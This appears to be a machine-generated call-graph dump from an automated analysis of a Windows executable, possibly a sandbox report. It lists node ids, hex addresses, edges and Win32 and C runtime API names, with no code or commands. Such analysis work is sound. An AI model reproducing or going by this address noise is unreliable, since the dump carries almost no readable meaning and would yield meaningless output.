4115d7 52 API calls 84445->84448 84452 402f00 84446->84452 84449 40bdf6 84448->84449 84449->84444 84450 4115d7 52 API calls 84449->84450 84450->84444 84451->84436 84453 402f10 84452->84453 84454 402f0c 84452->84454 84455 4115d7 52 API calls 84453->84455 84456 4268c3 84453->84456 84454->84444 84457 402f51 moneypunct _memmove 84455->84457 84457->84444 84458 425ba2 84463 40e360 84458->84463 84460 425bb4 84479 41130a 51 API calls __cinit 84460->84479 84462 425bbe 84464 4115d7 52 API calls 84463->84464 84465 40e3ec GetModuleFileNameW 84464->84465 84480 413a0e 84465->84480 84467 40e421 _wcsncat 84483 413a9e 84467->84483 84470 4115d7 52 API calls 84471 40e45e _wcscpy 84470->84471 84486 40bc70 84471->84486 84475 40e4a9 84475->84460 84476 401c90 52 API calls 84478 40e4a1 _wcscat _wcslen _wcsncpy 84476->84478 84477 4115d7 52 API calls 84477->84478 84478->84475 84478->84476 84478->84477 84479->84462 84505 413801 84480->84505 84535 419efd 84483->84535 84487 4115d7 52 API calls 84486->84487 84488 40bc98 84487->84488 84489 4115d7 52 API calls 84488->84489 84490 40bca6 84489->84490 84491 40e4c0 84490->84491 84547 403350 84491->84547 84493 40e4cb RegOpenKeyExW 84494 427190 RegQueryValueExW 84493->84494 84495 40e4eb 84493->84495 84496 4271b0 84494->84496 84497 42721a RegCloseKey 84494->84497 84495->84478 84498 4115d7 52 API calls 84496->84498 84497->84478 84499 4271cb 84498->84499 84554 43652f 52 API calls 84499->84554 84501 4271d8 RegQueryValueExW 84502 4271f7 84501->84502 84504 42720e 84501->84504 84503 402160 52 API calls 84502->84503 84503->84504 84504->84497 84506 41381a 84505->84506 84507 41389e 84505->84507 84506->84507 84518 41388a 84506->84518 84527 419e30 46 API calls __wcsnicmp 84506->84527 84508 4139e8 84507->84508 84509 413a00 84507->84509 84532 417f77 46 API calls __getptd_noexit 84508->84532 84534 417f77 46 API calls __getptd_noexit 84509->84534 84512 4139ed 84533 417f25 10 API calls __wcsnicmp 84512->84533 84515 41396c 84515->84507 84516 413967 84515->84516 84519 
41397a 84515->84519 84516->84467 84517 413929 84517->84507 84520 413945 84517->84520 84529 419e30 46 API calls __wcsnicmp 84517->84529 84518->84507 84526 413909 84518->84526 84528 419e30 46 API calls __wcsnicmp 84518->84528 84531 419e30 46 API calls __wcsnicmp 84519->84531 84520->84507 84520->84516 84522 41395b 84520->84522 84530 419e30 46 API calls __wcsnicmp 84522->84530 84526->84515 84526->84517 84527->84518 84528->84526 84529->84520 84530->84516 84531->84516 84532->84512 84533->84516 84534->84516 84536 419f13 84535->84536 84537 419f0e 84535->84537 84544 417f77 46 API calls __getptd_noexit 84536->84544 84537->84536 84543 419f2b 84537->84543 84541 40e454 84541->84470 84542 419f18 84545 417f25 10 API calls __wcsnicmp 84542->84545 84543->84541 84546 417f77 46 API calls __getptd_noexit 84543->84546 84544->84542 84545->84541 84546->84542 84548 403367 84547->84548 84549 403358 84547->84549 84550 4115d7 52 API calls 84548->84550 84549->84493 84551 403370 84550->84551 84552 4115d7 52 API calls 84551->84552 84553 40339e 84552->84553 84553->84493 84554->84501 84555 416454 84592 416c70 84555->84592 84557 416460 GetStartupInfoW 84558 416474 84557->84558 84593 419d5a HeapCreate 84558->84593 84560 4164cd 84561 4164d8 84560->84561 84677 41642b 46 API calls 3 library calls 84560->84677 84594 417c20 GetModuleHandleW 84561->84594 84564 4164de 84565 4164e9 __RTC_Initialize 84564->84565 84678 41642b 46 API calls 3 library calls 84564->84678 84613 41aaa1 GetStartupInfoW 84565->84613 84569 416503 GetCommandLineW 84626 41f584 GetEnvironmentStringsW 84569->84626 84572 416513 84632 41f4d6 GetModuleFileNameW 84572->84632 84575 41651d 84576 416528 84575->84576 84680 411924 46 API calls 3 library calls 84575->84680 84636 41f2a4 84576->84636 84579 41652e 84580 416539 84579->84580 84681 411924 46 API calls 3 library calls 84579->84681 84650 411703 84580->84650 84583 416541 84585 41654c __wwincmdln 84583->84585 84682 411924 46 API calls 3 library calls 84583->84682 84654 40d6b0 84585->84654 
84588 41657c 84684 411906 46 API calls _doexit 84588->84684 84591 416581 __close 84592->84557 84593->84560 84595 417c34 84594->84595 84596 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84594->84596 84685 4178ff 49 API calls _free 84595->84685 84598 417c87 TlsAlloc 84596->84598 84601 417cd5 TlsSetValue 84598->84601 84602 417d96 84598->84602 84599 417c39 84599->84564 84601->84602 84603 417ce6 __init_pointers 84601->84603 84602->84564 84686 418151 InitializeCriticalSectionAndSpinCount 84603->84686 84605 417d91 84694 4178ff 49 API calls _free 84605->84694 84607 417d2a 84607->84605 84687 416b49 84607->84687 84610 417d76 84693 41793c 46 API calls 4 library calls 84610->84693 84612 417d7e GetCurrentThreadId 84612->84602 84614 416b49 __calloc_crt 46 API calls 84613->84614 84625 41aabf 84614->84625 84615 41ac6a GetStdHandle 84620 41ac34 84615->84620 84616 416b49 __calloc_crt 46 API calls 84616->84625 84617 41acce SetHandleCount 84624 4164f7 84617->84624 84618 41ac7c GetFileType 84618->84620 84619 41abb4 84619->84620 84621 41abe0 GetFileType 84619->84621 84622 41abeb InitializeCriticalSectionAndSpinCount 84619->84622 84620->84615 84620->84617 84620->84618 84623 41aca2 InitializeCriticalSectionAndSpinCount 84620->84623 84621->84619 84621->84622 84622->84619 84622->84624 84623->84620 84623->84624 84624->84569 84679 411924 46 API calls 3 library calls 84624->84679 84625->84616 84625->84619 84625->84620 84625->84624 84625->84625 84627 41f595 84626->84627 84628 41f599 84626->84628 84627->84572 84628->84628 84704 416b04 84628->84704 84630 41f5bb _memmove 84631 41f5c2 FreeEnvironmentStringsW 84630->84631 84631->84572 84633 41f50b _wparse_cmdline 84632->84633 84634 416b04 __malloc_crt 46 API calls 84633->84634 84635 41f54e _wparse_cmdline 84633->84635 84634->84635 84635->84575 84637 41f2bc _wcslen 84636->84637 84639 41f2b4 84636->84639 84638 416b49 __calloc_crt 46 API calls 84637->84638 84641 41f2e0 _wcslen 84638->84641 84639->84579 84640 41f336 84711 413748 
84640->84711 84641->84639 84641->84640 84643 416b49 __calloc_crt 46 API calls 84641->84643 84644 41f35c 84641->84644 84647 41f373 84641->84647 84710 41ef12 46 API calls __wcsnicmp 84641->84710 84643->84641 84645 413748 _free 46 API calls 84644->84645 84645->84639 84717 417ed3 84647->84717 84649 41f37f 84649->84579 84651 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84650->84651 84653 411750 __IsNonwritableInCurrentImage 84651->84653 84736 41130a 51 API calls __cinit 84651->84736 84653->84583 84655 42e2f3 84654->84655 84656 40d6cc 84654->84656 84737 408f40 84656->84737 84658 40d707 84741 40ebb0 84658->84741 84661 40d737 84744 411951 84661->84744 84666 40d751 84756 40f4e0 SystemParametersInfoW SystemParametersInfoW 84666->84756 84668 40d75f 84757 40d590 GetCurrentDirectoryW 84668->84757 84670 40d767 SystemParametersInfoW 84671 40d794 84670->84671 84672 40d78d FreeLibrary 84670->84672 84673 408f40 VariantClear 84671->84673 84672->84671 84674 40d79d 84673->84674 84675 408f40 VariantClear 84674->84675 84676 40d7a6 84675->84676 84676->84588 84683 4118da 46 API calls _doexit 84676->84683 84677->84561 84678->84565 84683->84588 84684->84591 84685->84599 84686->84607 84689 416b52 84687->84689 84690 416b8f 84689->84690 84691 416b70 Sleep 84689->84691 84695 41f677 84689->84695 84690->84605 84690->84610 84692 416b85 84691->84692 84692->84689 84692->84690 84693->84612 84694->84602 84696 41f683 84695->84696 84702 41f69e _malloc 84695->84702 84697 41f68f 84696->84697 84696->84702 84703 417f77 46 API calls __getptd_noexit 84697->84703 84699 41f6b1 HeapAlloc 84701 41f6d8 84699->84701 84699->84702 84700 41f694 84700->84689 84701->84689 84702->84699 84702->84701 84703->84700 84707 416b0d 84704->84707 84705 4135bb _malloc 45 API calls 84705->84707 84706 416b43 84706->84630 84707->84705 84707->84706 84708 416b24 Sleep 84707->84708 84709 416b39 84708->84709 84709->84706 84709->84707 84710->84641 84712 41377c __dosmaperr 84711->84712 84713 413753 RtlFreeHeap 
84711->84713 84712->84639 84713->84712 84714 413768 84713->84714 84720 417f77 46 API calls __getptd_noexit 84714->84720 84716 41376e GetLastError 84716->84712 84721 417daa 84717->84721 84720->84716 84722 417dc9 _memcpy_s __call_reportfault 84721->84722 84723 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84722->84723 84726 417eb5 __call_reportfault 84723->84726 84725 417ed1 GetCurrentProcess TerminateProcess 84725->84649 84727 41a208 84726->84727 84728 41a210 84727->84728 84729 41a212 IsDebuggerPresent 84727->84729 84728->84725 84735 41fe19 84729->84735 84732 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84733 421ff0 __call_reportfault 84732->84733 84734 421ff8 GetCurrentProcess TerminateProcess 84732->84734 84733->84734 84734->84725 84735->84732 84736->84653 84738 408f48 moneypunct 84737->84738 84739 4265c7 VariantClear 84738->84739 84740 408f55 moneypunct 84738->84740 84739->84740 84740->84658 84797 40ebd0 84741->84797 84801 4182cb 84744->84801 84746 41195e 84808 4181f2 LeaveCriticalSection 84746->84808 84748 40d748 84749 4119b0 84748->84749 84750 4119d6 84749->84750 84751 4119bc 84749->84751 84750->84666 84751->84750 84843 417f77 46 API calls __getptd_noexit 84751->84843 84753 4119c6 84844 417f25 10 API calls __wcsnicmp 84753->84844 84755 4119d1 84755->84666 84756->84668 84845 401f20 84757->84845 84759 40d5b6 IsDebuggerPresent 84760 40d5c4 84759->84760 84761 42e1bb MessageBoxA 84759->84761 84762 40d5e3 84760->84762 84763 42e1d4 84760->84763 84761->84763 84915 40f520 84762->84915 85017 403a50 52 API calls 3 library calls 84763->85017 84767 40d5fd GetFullPathNameW 84927 401460 84767->84927 84769 40d63b 84770 40d643 84769->84770 84772 42e231 SetCurrentDirectoryW 84769->84772 84771 40d64c 84770->84771 85018 432fee 6 API calls 84770->85018 84942 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84771->84942 84772->84770 84775 42e252 84775->84771 84777 42e25a GetModuleFileNameW 84775->84777 84779 42e274 
84777->84779 84780 42e2cb GetForegroundWindow ShellExecuteW 84777->84780 85019 401b10 84779->85019 84784 40d688 84780->84784 84781 40d656 84783 40d669 84781->84783 84786 40e0c0 74 API calls 84781->84786 84950 4091e0 84783->84950 84788 40d692 SetCurrentDirectoryW 84784->84788 84786->84783 84788->84670 84791 42e28d 85026 40d200 52 API calls 2 library calls 84791->85026 84794 42e299 GetForegroundWindow ShellExecuteW 84795 42e2c6 84794->84795 84795->84784 84796 40ec00 LoadLibraryA GetProcAddress 84796->84661 84798 40d72e 84797->84798 84799 40ebd6 LoadLibraryA 84797->84799 84798->84661 84798->84796 84799->84798 84800 40ebe7 GetProcAddress 84799->84800 84800->84798 84802 4182e0 84801->84802 84803 4182f3 EnterCriticalSection 84801->84803 84809 418209 84802->84809 84803->84746 84805 4182e6 84805->84803 84836 411924 46 API calls 3 library calls 84805->84836 84808->84748 84810 418215 __close 84809->84810 84811 418225 84810->84811 84812 41823d 84810->84812 84837 418901 46 API calls __NMSG_WRITE 84811->84837 84814 41824b __close 84812->84814 84815 416b04 __malloc_crt 45 API calls 84812->84815 84814->84805 84817 418256 84815->84817 84816 41822a 84838 418752 46 API calls 8 library calls 84816->84838 84819 41825d 84817->84819 84820 41826c 84817->84820 84840 417f77 46 API calls __getptd_noexit 84819->84840 84823 4182cb __lock 45 API calls 84820->84823 84821 418231 84839 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84821->84839 84825 418273 84823->84825 84827 4182a6 84825->84827 84828 41827b InitializeCriticalSectionAndSpinCount 84825->84828 84829 413748 _free 45 API calls 84827->84829 84830 418297 84828->84830 84831 41828b 84828->84831 84829->84830 84842 4182c2 LeaveCriticalSection _doexit 84830->84842 84832 413748 _free 45 API calls 84831->84832 84834 418291 84832->84834 84841 417f77 46 API calls __getptd_noexit 84834->84841 84837->84816 84838->84821 84840->84814 84841->84830 84842->84814 84843->84753 84844->84755 85027 40e6e0 84845->85027 84849 401f41 
GetModuleFileNameW 85045 410100 84849->85045 84851 401f5c 85057 410960 84851->85057 84854 401b10 52 API calls 84855 401f81 84854->84855 85060 401980 84855->85060 84857 401f8e 84858 408f40 VariantClear 84857->84858 84859 401f9d 84858->84859 84860 401b10 52 API calls 84859->84860 84861 401fb4 84860->84861 84862 401980 53 API calls 84861->84862 84863 401fc3 84862->84863 84864 401b10 52 API calls 84863->84864 84865 401fd2 84864->84865 85068 40c2c0 84865->85068 84867 401fe1 84868 40bc70 52 API calls 84867->84868 84869 401ff3 84868->84869 85086 401a10 84869->85086 84871 401ffe 85093 4114ab 84871->85093 84874 428b05 84876 401a10 52 API calls 84874->84876 84875 402017 84877 4114ab __wcsicoll 58 API calls 84875->84877 84878 428b18 84876->84878 84879 402022 84877->84879 84881 401a10 52 API calls 84878->84881 84879->84878 84880 40202d 84879->84880 84882 4114ab __wcsicoll 58 API calls 84880->84882 84883 428b33 84881->84883 84884 402038 84882->84884 84886 428b3b GetModuleFileNameW 84883->84886 84885 402043 84884->84885 84884->84886 84888 4114ab __wcsicoll 58 API calls 84885->84888 84887 401a10 52 API calls 84886->84887 84890 428b6c 84887->84890 84889 40204e 84888->84889 84891 402092 84889->84891 84895 401a10 52 API calls 84889->84895 84900 428b90 _wcscpy 84889->84900 84892 40e0a0 52 API calls 84890->84892 84894 4020a3 84891->84894 84891->84900 84893 428b7a 84892->84893 84896 401a10 52 API calls 84893->84896 84897 428bc6 84894->84897 85101 40e830 53 API calls 84894->85101 84898 402073 _wcscpy 84895->84898 84899 428b88 84896->84899 84905 401a10 52 API calls 84898->84905 84899->84900 84902 401a10 52 API calls 84900->84902 84910 4020d0 84902->84910 84903 4020bb 85102 40cf00 53 API calls 84903->85102 84905->84891 84906 4020c6 84907 408f40 VariantClear 84906->84907 84907->84910 84908 402110 84912 408f40 VariantClear 84908->84912 84910->84908 84913 401a10 52 API calls 84910->84913 85103 40cf00 53 API calls 84910->85103 85104 40e6a0 53 API calls 84910->85104 84914 402120 moneypunct 
84912->84914 84913->84910 84914->84759 84916 4295c9 _memcpy_s 84915->84916 84917 40f53c 84915->84917 84920 4295d9 GetOpenFileNameW 84916->84920 85780 410120 84917->85780 84919 40f545 85784 4102b0 SHGetMalloc 84919->85784 84920->84917 84923 40d5f5 84920->84923 84922 40f54c 85789 410190 GetFullPathNameW 84922->85789 84923->84767 84923->84769 84925 40f559 85800 40f570 84925->85800 85862 402400 84927->85862 84929 40146f 84933 428c29 _wcscat 84929->84933 85871 401500 84929->85871 84931 40147c 84931->84933 85879 40d440 84931->85879 84934 401489 84934->84933 84935 401491 GetFullPathNameW 84934->84935 84936 402160 52 API calls 84935->84936 84937 4014bb 84936->84937 84938 402160 52 API calls 84937->84938 84939 4014c8 84938->84939 84939->84933 84940 402160 52 API calls 84939->84940 84941 4014ee 84940->84941 84941->84769 84943 428361 84942->84943 84944 4103fc LoadImageW RegisterClassExW 84942->84944 85899 44395e EnumResourceNamesW LoadImageW 84943->85899 85898 410490 7 API calls 84944->85898 84947 40d651 84949 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84947->84949 84948 428368 84949->84781 84951 42d7ad 84950->84951 84953 409202 84950->84953 86174 45e737 90 API calls 3 library calls 84951->86174 85011 409216 moneypunct 84953->85011 86171 410940 331 API calls 84953->86171 84955 409386 84956 40939c 84955->84956 86172 40f190 10 API calls 84955->86172 84956->84784 85016 401000 Shell_NotifyIconW _memcpy_s 84956->85016 84958 4095b2 84958->84956 84959 4095bf 84958->84959 86173 401a50 331 API calls 84959->86173 84960 409253 PeekMessageW 84960->85011 84962 42d8cd Sleep 84962->85011 84963 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84963->84956 84966 4095f9 84963->84966 84965 42e13b 86192 40d410 VariantClear 84965->86192 84968 42e158 TranslateMessage DispatchMessageW GetMessageW 84966->84968 84968->84968 84971 42e188 84968->84971 84970 409567 PeekMessageW 84970->85011 84971->84956 84974 46fdbf 108 API calls 85015 4094e0 84974->85015 84975 46f3c1 107 API calls 
84975->85011 84976 40e0a0 52 API calls 84976->85011 84977 409551 TranslateMessage DispatchMessageW 84977->84970 84979 42dcd2 WaitForSingleObject 84980 42dcf0 GetExitCodeProcess CloseHandle 84979->84980 84979->85011 86181 40d410 VariantClear 84980->86181 84982 44c29d 52 API calls 84982->85015 84983 42dd3d Sleep 84983->85015 84984 47d33e 309 API calls 84984->85011 84987 4094cf Sleep 84987->85015 84989 42d94d timeGetTime 86177 465124 53 API calls 84989->86177 84991 40d410 VariantClear 84991->85011 84992 40c620 timeGetTime 84992->85015 84995 42dd89 CloseHandle 84995->85015 84996 408f40 VariantClear 84996->85015 84998 465124 53 API calls 84998->85015 84999 42de19 GetExitCodeProcess CloseHandle 84999->85015 85001 401b10 52 API calls 85001->85015 85004 42de88 Sleep 85004->85011 85006 401980 53 API calls 85006->85015 85007 45e737 90 API calls 85007->85011 85010 42e0cc VariantClear 85010->85011 85011->84955 85011->84960 85011->84962 85011->84965 85011->84970 85011->84975 85011->84976 85011->84977 85011->84979 85011->84983 85011->84984 85011->84987 85011->84989 85011->84991 85011->85007 85011->85010 85012 408f40 VariantClear 85011->85012 85011->85015 85900 4091b0 85011->85900 85958 40afa0 85011->85958 85984 408fc0 85011->85984 86019 408cc0 85011->86019 86033 40d150 85011->86033 86038 40d170 85011->86038 86044 4096a0 85011->86044 86175 465124 53 API calls 85011->86175 86176 40c620 timeGetTime 85011->86176 86191 40e270 VariantClear moneypunct 85011->86191 85012->85011 85015->84974 85015->84982 85015->84992 85015->84995 85015->84996 85015->84998 85015->84999 85015->85001 85015->85004 85015->85006 85015->85011 86178 45178a 54 API calls 85015->86178 86179 47d33e 331 API calls 85015->86179 86180 453bc6 54 API calls 85015->86180 86182 40d410 VariantClear 85015->86182 86183 443d19 67 API calls _wcslen 85015->86183 86184 4574b4 VariantClear 85015->86184 86185 403cd0 85015->86185 86189 4731e1 VariantClear 85015->86189 86190 4331a2 6 API calls 85015->86190 85016->84784 85017->84769 
85018->84775 85020 401b16 _wcslen 85019->85020 85021 4115d7 52 API calls 85020->85021 85024 401b63 85020->85024 85022 401b4b _memmove 85021->85022 85023 4115d7 52 API calls 85022->85023 85023->85024 85025 40d200 52 API calls 2 library calls 85024->85025 85025->84791 85026->84794 85028 40bc70 52 API calls 85027->85028 85029 401f31 85028->85029 85030 402560 85029->85030 85031 40256d __write_nolock 85030->85031 85032 402160 52 API calls 85031->85032 85034 402593 85032->85034 85044 4025bd 85034->85044 85105 401c90 85034->85105 85035 4026f0 52 API calls 85035->85044 85036 4026a7 85037 401b10 52 API calls 85036->85037 85043 4026db 85036->85043 85039 4026d1 85037->85039 85038 401b10 52 API calls 85038->85044 85109 40d7c0 52 API calls 2 library calls 85039->85109 85041 401c90 52 API calls 85041->85044 85043->84849 85044->85035 85044->85036 85044->85038 85044->85041 85108 40d7c0 52 API calls 2 library calls 85044->85108 85110 40f760 85045->85110 85048 410118 85048->84851 85050 42805d 85051 42806a 85050->85051 85166 431e58 85050->85166 85053 413748 _free 46 API calls 85051->85053 85054 428078 85053->85054 85055 431e58 82 API calls 85054->85055 85056 428084 85055->85056 85056->84851 85058 4115d7 52 API calls 85057->85058 85059 401f74 85058->85059 85059->84854 85061 4019a3 85060->85061 85062 401985 85060->85062 85061->85062 85063 4019b8 85061->85063 85065 40199f 85062->85065 85768 403e10 53 API calls 85062->85768 85769 403e10 53 API calls 85063->85769 85065->84857 85067 4019c4 85067->84857 85069 40c2c7 85068->85069 85070 40c30e 85068->85070 85073 40c2d3 85069->85073 85074 426c79 85069->85074 85071 40c315 85070->85071 85072 426c2b 85070->85072 85075 40c321 85071->85075 85076 426c5a 85071->85076 85078 426c4b 85072->85078 85079 426c2e 85072->85079 85770 403ea0 52 API calls __cinit 85073->85770 85775 4534e3 52 API calls 85074->85775 85771 403ea0 52 API calls __cinit 85075->85771 85774 4534e3 52 API calls 85076->85774 85773 4534e3 52 API calls 85078->85773 85085 40c2de 85079->85085 
85772 4534e3 52 API calls 85079->85772 85085->84867 85087 401a30 85086->85087 85088 401a17 85086->85088 85090 402160 52 API calls 85087->85090 85089 401a2d 85088->85089 85776 403c30 52 API calls _memmove 85088->85776 85089->84871 85092 401a3d 85090->85092 85092->84871 85094 411523 85093->85094 85095 4114ba 85093->85095 85779 4113a8 58 API calls 3 library calls 85094->85779 85099 40200c 85095->85099 85777 417f77 46 API calls __getptd_noexit 85095->85777 85098 4114c6 85778 417f25 10 API calls __wcsnicmp 85098->85778 85099->84874 85099->84875 85101->84903 85102->84906 85103->84910 85104->84910 85106 4026f0 52 API calls 85105->85106 85107 401c97 85106->85107 85107->85034 85108->85044 85109->85043 85170 40f6f0 85110->85170 85112 40f77b _strcat moneypunct 85178 40f850 85112->85178 85117 427c2a 85207 414d04 85117->85207 85119 40f7fc 85119->85117 85120 40f804 85119->85120 85194 414a46 85120->85194 85124 40f80e 85124->85048 85129 4528bd 85124->85129 85126 427c59 85213 414fe2 85126->85213 85128 427c79 85130 4150d1 _fseek 81 API calls 85129->85130 85131 452930 85130->85131 85710 452719 85131->85710 85134 452948 85134->85050 85135 414d04 __fread_nolock 61 API calls 85136 452966 85135->85136 85137 414d04 __fread_nolock 61 API calls 85136->85137 85138 452976 85137->85138 85139 414d04 __fread_nolock 61 API calls 85138->85139 85140 45298f 85139->85140 85141 414d04 __fread_nolock 61 API calls 85140->85141 85142 4529aa 85141->85142 85143 4150d1 _fseek 81 API calls 85142->85143 85144 4529c4 85143->85144 85145 4135bb _malloc 46 API calls 85144->85145 85146 4529cf 85145->85146 85147 4135bb _malloc 46 API calls 85146->85147 85148 4529db 85147->85148 85149 414d04 __fread_nolock 61 API calls 85148->85149 85150 4529ec 85149->85150 85151 44afef GetSystemTimeAsFileTime 85150->85151 85152 452a00 85151->85152 85153 452a36 85152->85153 85154 452a13 85152->85154 85155 452aa5 85153->85155 85156 452a3c 85153->85156 85157 413748 _free 46 API calls 85154->85157 85160 413748 _free 46 API calls 
85155->85160 85716 44b1a9 85156->85716 85158 452a1c 85157->85158 85161 413748 _free 46 API calls 85158->85161 85163 452aa3 85160->85163 85164 452a25 85161->85164 85162 452a9d 85165 413748 _free 46 API calls 85162->85165 85163->85050 85164->85050 85165->85163 85167 431e64 85166->85167 85168 431e6a 85166->85168 85169 414a46 __fcloseall 82 API calls 85167->85169 85168->85051 85169->85168 85171 425de2 85170->85171 85174 40f6fc _wcslen 85170->85174 85171->85112 85172 40f710 WideCharToMultiByte 85173 40f756 85172->85173 85175 40f728 85172->85175 85173->85112 85174->85172 85176 4115d7 52 API calls 85175->85176 85177 40f735 WideCharToMultiByte 85176->85177 85177->85112 85179 40f85d _memcpy_s _strlen 85178->85179 85181 40f7ab 85179->85181 85226 414db8 85179->85226 85182 4149c2 85181->85182 85238 414904 85182->85238 85184 40f7e9 85184->85117 85185 40f5c0 85184->85185 85189 40f5cd _strcat __write_nolock _memmove 85185->85189 85186 414d04 __fread_nolock 61 API calls 85186->85189 85187 40f691 __tzset_nolock 85187->85119 85189->85186 85189->85187 85191 425d11 85189->85191 85326 4150d1 85189->85326 85190 4150d1 _fseek 81 API calls 85192 425d33 85190->85192 85191->85190 85193 414d04 __fread_nolock 61 API calls 85192->85193 85193->85187 85195 414a52 __close 85194->85195 85196 414a64 85195->85196 85197 414a79 85195->85197 85466 417f77 46 API calls __getptd_noexit 85196->85466 85200 415471 __lock_file 47 API calls 85197->85200 85204 414a74 __close 85197->85204 85199 414a69 85467 417f25 10 API calls __wcsnicmp 85199->85467 85202 414a92 85200->85202 85450 4149d9 85202->85450 85204->85124 85535 414c76 85207->85535 85209 414d1c 85210 44afef 85209->85210 85703 442c5a 85210->85703 85212 44b00d 85212->85126 85214 414fee __close 85213->85214 85215 414ffa 85214->85215 85216 41500f 85214->85216 85707 417f77 46 API calls __getptd_noexit 85215->85707 85218 415471 __lock_file 47 API calls 85216->85218 85220 415017 85218->85220 85219 414fff 85708 417f25 10 API calls __wcsnicmp 85219->85708 85222 
414e4e __ftell_nolock 51 API calls 85220->85222 85223 415024 85222->85223 85709 41503d LeaveCriticalSection LeaveCriticalSection _fseek 85223->85709 85225 41500a __close 85225->85128 85227 414dd6 85226->85227 85228 414deb 85226->85228 85235 417f77 46 API calls __getptd_noexit 85227->85235 85228->85227 85233 414df2 85228->85233 85230 414ddb 85236 417f25 10 API calls __wcsnicmp 85230->85236 85232 414de6 85232->85179 85233->85232 85237 418f98 77 API calls 7 library calls 85233->85237 85235->85230 85236->85232 85237->85232 85241 414910 __close 85238->85241 85239 414923 85294 417f77 46 API calls __getptd_noexit 85239->85294 85241->85239 85243 414951 85241->85243 85242 414928 85295 417f25 10 API calls __wcsnicmp 85242->85295 85257 41d4d1 85243->85257 85246 414956 85247 41496a 85246->85247 85248 41495d 85246->85248 85249 414992 85247->85249 85250 414972 85247->85250 85296 417f77 46 API calls __getptd_noexit 85248->85296 85274 41d218 85249->85274 85297 417f77 46 API calls __getptd_noexit 85250->85297 85256 414933 __close @_EH4_CallFilterFunc@8 85256->85184 85258 41d4dd __close 85257->85258 85259 4182cb __lock 46 API calls 85258->85259 85272 41d4eb 85259->85272 85260 41d560 85299 41d5fb 85260->85299 85261 41d567 85262 416b04 __malloc_crt 46 API calls 85261->85262 85264 41d56e 85262->85264 85264->85260 85266 41d57c InitializeCriticalSectionAndSpinCount 85264->85266 85265 41d5f0 __close 85265->85246 85267 41d59c 85266->85267 85268 41d5af EnterCriticalSection 85266->85268 85271 413748 _free 46 API calls 85267->85271 85268->85260 85269 418209 __mtinitlocknum 46 API calls 85269->85272 85271->85260 85272->85260 85272->85261 85272->85269 85302 4154b2 47 API calls __lock 85272->85302 85303 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85272->85303 85275 41d23a 85274->85275 85276 41d255 85275->85276 85288 41d26c __wopenfile 85275->85288 85308 417f77 46 API calls __getptd_noexit 85276->85308 85278 41d421 85281 41d47a 85278->85281 85282 41d48c 85278->85282 85279 41d25a 
[Execution graph residue: the interactive call-graph view of the Joe Sandbox report survived only as a flat dump of node ids (84919 to 86631), function addresses (0x401xxx to 0x47fxxx), edges ("A->B"), API-call counts and routine names; the graph itself is not recoverable. Recoverable labels: Win32 APIs GetFullPathNameW, SHGetDesktopFolder, SHGetPathFromIDListW, CreateFileW, ReadFile, WriteFile, SetFilePointer, SetFilePointerEx, CloseHandle, GetLastError, FindFirstFileW, FindClose, GetFileAttributesW, MultiByteToWideChar, CharUpperBuffW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, VariantInit, VariantCopy, VariantClear, InterlockedIncrement, InterlockedDecrement, Sleep, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetSystemTimeAsFileTime; CRT internals __wcsnicmp, __getptd_noexit, __dosmaperr, _fseek, __fclose_nolock, __fcloseall, __fread_nolock, __write, __read, __commit, __lock_fhandle, __unlock_fhandle, __lseeki64_nolock, __tsopen_nolock, __wsopen_helper, __malloc_crt, _malloc, _free, __tzset_nolock, __wsplitpath, __wcsicoll, _memcpy_s, _memmove, _wcscpy, _wcsncpy, _wcslen, _wprintf, moneypunct.]
467b55 86581->86584 86583 4115d7 52 API calls 86582->86583 86583->86588 86585 4115d7 52 API calls 86584->86585 86586 467b5b 86585->86586 86592 442ee0 52 API calls 86586->86592 86588->86562 86589->86581 86590 467b6b 86593 45f645 54 API calls moneypunct 86590->86593 86592->86590 86593->86582 86594->86574 86598 443e19 86595->86598 86599 443e26 86598->86599 86600 443e32 WriteFile 86598->86600 86601 443db4 SetFilePointerEx SetFilePointerEx 86599->86601 86600->86567 86601->86600 86602->86040 86603->86138 86604->86055 86605->86102 86606->86167 86607->86102 86608->86102 86609->86075 86610->86100 86611->86066 86612->86070 86613->86076 86614->86131 86615->86131 86616->86131 86617->86092 86618->86106 86619->86093 86620->86123 86621->86144 86622->86144 86623->86138 86624->86151 86625->86164 86626->86158 86627->86162 86628->86170 86629->86170 86630->86106 86631->86060 86632 42d154 86636 480a8d 86632->86636 86634 42d161 86635 480a8d 194 API calls 86634->86635 86635->86634 86637 480ae4 86636->86637 86638 480b26 86636->86638 86640 480aeb 86637->86640 86641 480b15 86637->86641 86639 40bc70 52 API calls 86638->86639 86663 480b2e 86639->86663 86643 480aee 86640->86643 86644 480b04 86640->86644 86669 4805bf 194 API calls 86641->86669 86643->86638 86645 480af3 86643->86645 86668 47fea2 194 API calls __itow_s 86644->86668 86667 47f135 194 API calls 86645->86667 86647 40e0a0 52 API calls 86647->86663 86650 408f40 VariantClear 86652 481156 86650->86652 86651 480aff 86651->86650 86654 408f40 VariantClear 86652->86654 86653 40c2c0 52 API calls 86653->86663 86655 48115e 86654->86655 86655->86634 86656 480ff5 86675 45e737 90 API calls 3 library calls 86656->86675 86657 401980 53 API calls 86657->86663 86659 40e710 53 API calls 86659->86663 86660 40a780 194 API calls 86660->86663 86661 408e80 VariantClear 86661->86663 86663->86647 86663->86651 86663->86653 86663->86656 86663->86657 86663->86659 86663->86660 86663->86661 86670 45377f 52 API calls 86663->86670 86671 45e951 53 API calls 
